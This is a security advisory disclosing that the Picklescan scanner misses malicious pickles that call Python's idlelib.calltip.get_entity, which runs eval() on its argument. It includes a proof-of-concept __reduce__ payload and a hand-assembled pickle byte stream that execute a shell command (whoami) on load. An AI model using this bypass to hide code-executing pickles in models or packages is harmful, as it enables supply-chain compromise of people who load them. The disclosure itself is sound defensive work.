GHSA-9xph-j2h6-g47v: Picklescan has a missing detection when calling built-in python library idlelib.calltip.get_entity


Summary

A malicious pickle file can invoke idlelib.calltip.get_entity, a function from Python's standard library, to execute arbitrary code when the file is loaded; Picklescan fails to detect it.

Details

The attack proceeds in the following steps:

First, the attacker crafts a payload by returning the idlelib.calltip.get_entity function from a class's __reduce__ method.
Then the victim scans the pickle file with the Picklescan library, which reports no dangerous functions, and calls pickle.load() on the malicious file, leading to remote code execution.
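The root cause is that get_entity evaluates its argument with eval(). A simplified sketch of the function (modeled on CPython's idlelib/calltip.py; the real implementation also merges __main__.__dict__ into the evaluation namespace) shows why any expression string runs as code:

```python
import sys

def get_entity_sketch(expression):
    # Simplified model of idlelib.calltip.get_entity: the real function
    # eval()s the expression in a namespace built from sys.modules and
    # __main__.__dict__, returning None on any error.
    if expression:
        namespace = {**sys.modules}
        try:
            return eval(expression, namespace)  # attacker-controlled code runs here
        except BaseException:
            return None

# A harmless expression evaluates...
assert get_entity_sketch("1 + 1") == 2
# ...and so would "__import__('os').system('whoami')".
```

Because the dangerous call is hidden behind an innocuous-looking stdlib helper rather than eval or os.system directly, a denylist of known-bad globals misses it.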

PoC

import pickle
from idlelib.calltip import get_entity

class EvilCalltipGetEntity:
    def __reduce__(self):
        # get_entity(expression) -> eval(expression)
        return get_entity, ("__import__('os').system('whoami')",)

# Serializing records the call; loading the result executes `whoami`.
payload = pickle.dumps(EvilCalltipGetEntity())
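To see what a scanner is faced with, an equivalent pickle stream can be assembled by hand from protocol-0 opcodes (so this demonstration does not require idlelib to be importable) and disassembled with the stdlib pickletools module:

```python
import io
import pickletools

# Hand-assembled protocol-0 pickle equivalent to pickle.dumps() of the
# PoC object above: GLOBAL pushes idlelib.calltip.get_entity, REDUCE
# calls it with the attacker's expression string.
payload = (
    b"cidlelib.calltip\n"                          # GLOBAL: module name
    b"get_entity\n"                                # GLOBAL: attribute name
    b"(S\"__import__('os').system('whoami')\"\n"   # MARK, STRING argument
    b"tR."                                         # TUPLE, REDUCE, STOP
)

# Disassembling (never pickle.loads()!) shows the GLOBAL reference a
# denylist scanner has to recognize.
out = io.StringIO()
pickletools.dis(payload, out)
print(out.getvalue())
```

The disassembly contains a GLOBAL opcode for 'idlelib.calltip get_entity'; Picklescan versions before the fix referenced below did not treat that global as dangerous.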

Impact

Who is impacted? Any organization or individual relying on Picklescan to detect malicious pickle files, for example inside PyTorch models.
What is the impact? Attackers can embed malicious code in a pickle file that goes undetected by Picklescan but executes when the file is loaded.
Supply chain attack: attackers can distribute infected pickle files through ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu

References

  • GHSA-9xph-j2h6-g47v
  • mmaitre314/picklescan@aecd11b
